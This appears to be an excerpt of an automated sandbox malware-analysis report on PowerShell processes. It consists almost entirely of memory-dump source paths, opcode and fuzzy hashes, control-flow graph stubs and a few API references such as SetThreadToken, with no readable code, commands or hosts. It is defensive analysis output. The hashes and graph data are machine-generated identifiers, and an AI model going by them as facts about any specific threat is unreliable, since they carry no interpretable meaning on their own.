                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 87fb59cc69e988b97f02b3fd7f3ee8f43f2fbdf53f83b47844c1b8740e9ad8c0
                                                                                                                                              • Instruction ID: 4bbc608040e423f19333140659ed715cfc6d3fd774f1cdfe832ee75fae083df6
                                                                                                                                              • Opcode Fuzzy Hash: 87fb59cc69e988b97f02b3fd7f3ee8f43f2fbdf53f83b47844c1b8740e9ad8c0
                                                                                                                                              • Instruction Fuzzy Hash: 34E04F323052521FD71522BE5A206F7779E8FC66A5F4901BBD685E7643EC84AC0183F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7f4ea92d4bdfb96d233441faa0cd20c3756625b3127ef83815e491af4265a0c5
                                                                                                                                              • Instruction ID: 21b9c1a1053df3cdf6fd7906b7c1b25852d46b6d0b05a28b1fb0ba031dec7c3f
                                                                                                                                              • Opcode Fuzzy Hash: 7f4ea92d4bdfb96d233441faa0cd20c3756625b3127ef83815e491af4265a0c5
                                                                                                                                              • Instruction Fuzzy Hash: 5EE0ED397105108F97109B1DD854DA6B7EEEFDE62532504A9E585CB721DA61EC018BD0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1b592fab1b4ab819b2f09fbdf7ef4057141784604a6b0dde057c86ef352f22b2
                                                                                                                                              • Instruction ID: 1bc2fc92668c285610bbf04cd362c4d95315c47a3dcc4b95d40d456ad5c4a3b0
                                                                                                                                              • Opcode Fuzzy Hash: 1b592fab1b4ab819b2f09fbdf7ef4057141784604a6b0dde057c86ef352f22b2
                                                                                                                                              • Instruction Fuzzy Hash: F2E0ED3570A250CBCF0A6BB8B00C2EE3FA2EFC1729F14016ED90A87242CF79084287D4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3c62963b40092a577841f1bb181e6104d23f6cf3c64e3165633e32408f4dc857
                                                                                                                                              • Instruction ID: 6cac7387937837dd0fcb086f44ff41d726cfc82cabc3cc2f6c96d11d05fd242e
                                                                                                                                              • Opcode Fuzzy Hash: 3c62963b40092a577841f1bb181e6104d23f6cf3c64e3165633e32408f4dc857
                                                                                                                                              • Instruction Fuzzy Hash: 35E0DF2230D7D01B970B823F68244A27FBA8AC322030D41FEE0D4CFA53DD62AD0583E6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ee026303d0fbc9f1ea5abaf9a0db6c848e4391b45d35df7492c3fb94348d945f
                                                                                                                                              • Instruction ID: 5997d2914819061240074696251cbd97b7cbff0cee73dfb9df5982df06e1f1ab
                                                                                                                                              • Opcode Fuzzy Hash: ee026303d0fbc9f1ea5abaf9a0db6c848e4391b45d35df7492c3fb94348d945f
                                                                                                                                              • Instruction Fuzzy Hash: E4E0D8312003001B9125F27EEC4042EB78ADFC42A0364883DC50E87650DEB06C0147A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb267664877199904367c8228268778071a4fbe86809a835f9ea371bd53afbb0
                                                                                                                                              • Instruction ID: 15f4e02845c669e6494ddcb876e54878327e8d53ee6b53f9d7fcc0be559bcce1
                                                                                                                                              • Opcode Fuzzy Hash: eb267664877199904367c8228268778071a4fbe86809a835f9ea371bd53afbb0
                                                                                                                                              • Instruction Fuzzy Hash: C3E0D8353062848FC7069778A40C4997BB1DFC72A130901BFD54EC7391CA241C09CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6fe469811fb4837b973d45fde7174b140fd889ff70767044dfd459f339e534ba
                                                                                                                                              • Instruction ID: 245675c6574cdc8572b7d27a88ac5c9b5d39677163315168349cce578e9856c5
                                                                                                                                              • Opcode Fuzzy Hash: 6fe469811fb4837b973d45fde7174b140fd889ff70767044dfd459f339e534ba
                                                                                                                                              • Instruction Fuzzy Hash: C1E06574D01249AF8740DF78C841699FFF0EF45210B5480DEC948D7242EA315542CBD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 945f5a0b2c567c9b02e4830d09e2cfcee5de018ffa4c6745a5f8ff840025fd42
                                                                                                                                              • Instruction ID: c914ffa2da2c8cea6a20fdb7441837f4961166477bc7d0049bf15c653a40f4a6
                                                                                                                                              • Opcode Fuzzy Hash: 945f5a0b2c567c9b02e4830d09e2cfcee5de018ffa4c6745a5f8ff840025fd42
                                                                                                                                              • Instruction Fuzzy Hash: EFF0ED719013049BD764DFB9E49C79B7BE9EB45350F10442DE65EC7241DB356881CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9efab0b146ed87d14a2164dd57b84f3cdeb1795d5de5372cce1c9a8dbddd983d
                                                                                                                                              • Instruction ID: 79ea63a8ff8a3047ab7f4e18ebc635481def1dccbaf1e90747b8a1d6406bf5b0
                                                                                                                                              • Opcode Fuzzy Hash: 9efab0b146ed87d14a2164dd57b84f3cdeb1795d5de5372cce1c9a8dbddd983d
                                                                                                                                              • Instruction Fuzzy Hash: 28E06D3180920ADFCB0AAF75E80E4E97F38FF12341B0100AED45647152EA301A85CBD6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d414ca04ea14eb81ac057211c6a15278652c638cc0475cf712b576746e8a030b
                                                                                                                                              • Instruction ID: 6de2c7ad8a4f2d6dd5029d65aa37d9e550b05dfbede3d50fe248de7500ee2ea5
                                                                                                                                              • Opcode Fuzzy Hash: d414ca04ea14eb81ac057211c6a15278652c638cc0475cf712b576746e8a030b
                                                                                                                                              • Instruction Fuzzy Hash: C9E02035305110C7CF083B78B41C2AE7A56DBC4724F00002ED60A83343CF74184143D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 34a28e5502c644346df034a4d9b4288573e65fdd773465f2166973b2408d6012
                                                                                                                                              • Instruction ID: e221d68c55dde749dae522e79129d2328aac166852615b3d0efe47b3244e3ec0
                                                                                                                                              • Opcode Fuzzy Hash: 34a28e5502c644346df034a4d9b4288573e65fdd773465f2166973b2408d6012
                                                                                                                                              • Instruction Fuzzy Hash: FAD09E2671012617661472BE5A206FBA2CE8FC95A5F45017B9A89E7243ED84EC1143F5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e0af12d180676c041bc074b1b65ee9cf7b86fdae183158f921c08401b9e7786d
                                                                                                                                              • Instruction ID: d01b056d6b5da96678603cb5ae4c74d9aef54a95684d6333ee99514a8dfd1c00
                                                                                                                                              • Opcode Fuzzy Hash: e0af12d180676c041bc074b1b65ee9cf7b86fdae183158f921c08401b9e7786d
                                                                                                                                              • Instruction Fuzzy Hash: 35E08C31700614478612A66EA80089EB79ADAC86B6324842EE85D87301DE65EC0187D5
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID: dn^$dn^$dn^$dn^
• API String ID: 0-2231636864

Execution Graph

Execution Coverage: 6.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph 22233 83a6a50 22234 83a6a93 SetThreadToken 22233->22234 22235 83a6ac1 22234->22235

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 503 48ab569-48ab591 504 48ab593 503->504 505 48ab596-48ab8d1 call 48aaa7c 503->505 504->505 566 48ab8d6-48ab8dd 505->566
Memory Dump Source
• Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 651 48ab578-48ab591 652 48ab593 651->652 653 48ab596-48ab8d1 call 48aaa7c 651->653 652->653 714 48ab8d6-48ab8dd 653->714
Memory Dump Source
• Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

APIs
• SetThreadToken.KERNELBASE(?,?), ref: 083A6AB2
Memory Dump Source
• Source File: 00000019.00000002.2023176546.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_83a0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
                                                                                                                                              • Opcode ID: 796199cd36da110a890c0d46443a6eb30f51c71b88d3e146256a6f5bcf196791
                                                                                                                                              • Instruction ID: 84e088e9e56fc0a5250cb432b0fb1de511471ed837324ecf4421c32276ae6646
                                                                                                                                              • Opcode Fuzzy Hash: 796199cd36da110a890c0d46443a6eb30f51c71b88d3e146256a6f5bcf196791
                                                                                                                                              • Instruction Fuzzy Hash: A121B0B58053898FDB11DF99C845B9EFFF4EF8A320F1884AED044A7251D6759804CBA1

Control-flow Graph: 11 83a6a50-83a6abf SetThreadToken 13 83a6ac8-83a6ae5 11->13 14 83a6ac1-83a6ac7 11->14 14->13
APIs
• SetThreadToken.KERNELBASE(?,?), ref: 083A6AB2
Memory Dump Source
• Source File: 00000019.00000002.2023176546.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_83a0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 48d243b3ca7179006c92d2289e6b4e1d58a97997be99ba74192277ec0504196f
• Instruction ID: 9f17cb2f7404cd04e59ee317837b30190fa7401ed1b3eafa7f077ac03b14eb0a
• Opcode Fuzzy Hash: 48d243b3ca7179006c92d2289e6b4e1d58a97997be99ba74192277ec0504196f
• Instruction Fuzzy Hash: 7A1133B59003098FDB10DF9AC884BDEFBF8EB88320F24842AD418A3350D774A944CFA1

Control-flow Graph: entry block 7253ce8-7253d0d; full executed/not-executed node and edge list omitted
Memory Dump Source
• Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d83eae84153df52f305dc8405d20c2e53e09c8d6b6ff366751225d6d5d77044a
• Instruction ID: b0993c7b3dae8d6a3799d048edf685e045705856e018a25547b29d007f41a018
• Opcode Fuzzy Hash: d83eae84153df52f305dc8405d20c2e53e09c8d6b6ff366751225d6d5d77044a
• Instruction Fuzzy Hash: ED1269B1B243569FDB14EB68D4007ABBBE2AFC1254F24C47AD805CB282DB75DC91C7A1

Control-flow Graph: entry block 7252700-7252725; calls 48ae248, 48ae258, 48a7350, 48a7360; full executed/not-executed node and edge list omitted
Memory Dump Source
• Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c45a8d77fec02bd52b8f43f0a247b84bf103596abbe02a1812ded01d19ac3a1
• Instruction ID: dfda91a13265f7d47d25b76b2e7ef6ca723fa27ec3793a697b0fb5a9b960caa7
• Opcode Fuzzy Hash: 4c45a8d77fec02bd52b8f43f0a247b84bf103596abbe02a1812ded01d19ac3a1
• Instruction Fuzzy Hash: DBE118F1B30306DFDB24DBA9C4017AABBE1BF89211F14806AD905CB291DA75CD51C7A2

Control-flow Graph: entry block 48aea38-48aea58; calls 48a014c, 48aea28, 48aea38, 48aebae, 48aecd7; full executed/not-executed node and edge list omitted
Memory Dump Source
• Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53b9594a0aee40418eb6be8d84d4ef7144fc79b4da4508712876dfe97f2284d3
• Instruction ID: 6de1a7a51399c67e8c6e9a8f1e6fd1f0c8aa50cdaa4dc452df329da42ed91b27
• Opcode Fuzzy Hash: 53b9594a0aee40418eb6be8d84d4ef7144fc79b4da4508712876dfe97f2284d3
• Instruction Fuzzy Hash: 6F918F34B502188FEB14DF78D5946ADBBF6AF88710B148969E802EB351DF74EC52CB90

Control-flow Graph: entry block 48a7360-48a737f; calls 48a75fc, 48a7617, 48ac008, 48abff9; full executed/not-executed node and edge list omitted
Memory Dump Source
• Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 90bc2978ab6825aeac08fc202faa323418f34b1c296e48a5de3b130f09dcd99d
• Instruction ID: f7ee13dd3902ca7b54482e796e50f2ed220db462039d2e72e93371248e172fa1
• Opcode Fuzzy Hash: 90bc2978ab6825aeac08fc202faa323418f34b1c296e48a5de3b130f09dcd99d
• Instruction Fuzzy Hash: 24813A34B002048FEB14DF68D498AAEBBF6EF8D215F1545A9E406EB361DB74EC41DB60

Control-flow Graph: entry block 48abba8-48abc38; calls 48ab080, 48aa774; full executed/not-executed node and edge list omitted
Memory Dump Source
• Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d570ec1d14ffd1ec52919ca399f10486b81f5d64d15f1c013a0203d174a6e280
• Instruction ID: 7b482fb5f3aa6daa47979af452067aee5d1e33bcb863dea4c19f7195c9ee20ee
• Opcode Fuzzy Hash: d570ec1d14ffd1ec52919ca399f10486b81f5d64d15f1c013a0203d174a6e280
• Instruction Fuzzy Hash: BD611771E012489FEB14CFA9D584B9DFBF2EF88310F14852AE919AB350EB75AD41CB50

Control-flow Graph: entry block 48a76c0-48a76f6; calls 48a78b0, 48a78c0; full executed/not-executed node and edge list omitted
Memory Dump Source
• Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff3dd0b3ce4f9e72078cbebfec00af562a7d980056fd88c01f60a243edaecc03
• Instruction ID: 0750eae975b0d45255312dc076f77d32514e5852915d722022974a968396d1db
• Opcode Fuzzy Hash: ff3dd0b3ce4f9e72078cbebfec00af562a7d980056fd88c01f60a243edaecc03
• Instruction Fuzzy Hash: 9051CD353002059FF704DB69E844B6AB7EAEFC8214F248969E50ACB351EB75EC11DBA0
Memory Dump Source
• Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8057950a10b5cd4b555b1f0048dd9cab485170a79f20e2e8bb20a413d469aed2
                                                                                                                                              • Instruction ID: 5704092f559cc075507ad564e49e9d28d2b1b2db9c303100ba070a45d6a137d8
                                                                                                                                              • Opcode Fuzzy Hash: 8057950a10b5cd4b555b1f0048dd9cab485170a79f20e2e8bb20a413d469aed2
                                                                                                                                              • Instruction Fuzzy Hash: BB512975E012489FEB14CFA9D584B9DFBF2EF88310F14812AE919EB350EB74A945CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cf184ab27d36cf6d25c0bb4dd2b97f68030d6a26f2e3cee11ce78a9fe27319b4
                                                                                                                                              • Instruction ID: 76085b73b3cb1c45f145d9d2ec40f790aa6ff3a828d73c3102439cc8ecbc73ee
                                                                                                                                              • Opcode Fuzzy Hash: cf184ab27d36cf6d25c0bb4dd2b97f68030d6a26f2e3cee11ce78a9fe27319b4
                                                                                                                                              • Instruction Fuzzy Hash: 06419C787002098FEB10DFA8C594A2BB7E6EFD92057548968E849CF321EB74EC11CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 320f4ca21ec54fb574c5ece19332a69d37b29ae76e17bab4717987d2fb47710b
                                                                                                                                              • Instruction ID: eedfafddb589f84dddf3768d514f2880c60fad3276a4cc2c5a881c807c12b887
                                                                                                                                              • Opcode Fuzzy Hash: 320f4ca21ec54fb574c5ece19332a69d37b29ae76e17bab4717987d2fb47710b
                                                                                                                                              • Instruction Fuzzy Hash: 544126F1A202039FCB25CE28C550BAA7BF29F80298F1484AADC008F257D735DD45CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4feab481a646117cd49823279df397089df3cd233aa979d9bfbc2a1ac71f5c67
                                                                                                                                              • Instruction ID: 43e2ea8c17d7087d6ae1c4c05cbba3c52249cf3ac6ef0d34aa4ad6cc81b49ec1
                                                                                                                                              • Opcode Fuzzy Hash: 4feab481a646117cd49823279df397089df3cd233aa979d9bfbc2a1ac71f5c67
                                                                                                                                              • Instruction Fuzzy Hash: DA417C387002098FEB10DFA8C594A2BB7E6EF9D2457548968E949CF311EB74EC118BA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1a19f69340b6d39db185a7d75a84ddb3b14ef800b8bd57e8b2beba71c16b3f52
                                                                                                                                              • Instruction ID: 460828427d2db6e5978af5fa41f7d6be030ed60830ba9d4c635915bc3ba1d9ba
                                                                                                                                              • Opcode Fuzzy Hash: 1a19f69340b6d39db185a7d75a84ddb3b14ef800b8bd57e8b2beba71c16b3f52
                                                                                                                                              • Instruction Fuzzy Hash: 7E31AF753006008BE705EB78E844B9EB792EFC9211F048A39D509CB351EFB1EC15CBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b0e61f7d0c335b030f8e86386f5bdc50e6a39b46dd154ec90c37f36318160d0f
                                                                                                                                              • Instruction ID: d95d9bda668e9bda62bae747d02023509e23645297533f9437893f505ea97c6f
                                                                                                                                              • Opcode Fuzzy Hash: b0e61f7d0c335b030f8e86386f5bdc50e6a39b46dd154ec90c37f36318160d0f
                                                                                                                                              • Instruction Fuzzy Hash: 34318B74A01245CFDB11DF68D894AEEBBF2FF89200F148A69D406EB351DB74AC05CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5c9c4b0f894d786903184db6d80853704e35dda780831f03bce68de722c23c0
                                                                                                                                              • Instruction ID: 46f66873dc7bd1f48e2f3778fd54b021aa9101e7ea741c72c436fdaf87657f57
                                                                                                                                              • Opcode Fuzzy Hash: e5c9c4b0f894d786903184db6d80853704e35dda780831f03bce68de722c23c0
                                                                                                                                              • Instruction Fuzzy Hash: 3D314A34A012058FEB04CF68D498AAEBBF2AF8D311F1445A8E806EB351DB70EC51DB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 155d55a7a12d93a8919b839481e52ca8c44695cc7950cb8e35f15ae26aea4fa4
                                                                                                                                              • Instruction ID: 5bc041df806b32448ee86ea20e9f0cd1d27cca388e626e1e9974fb81272b1a5e
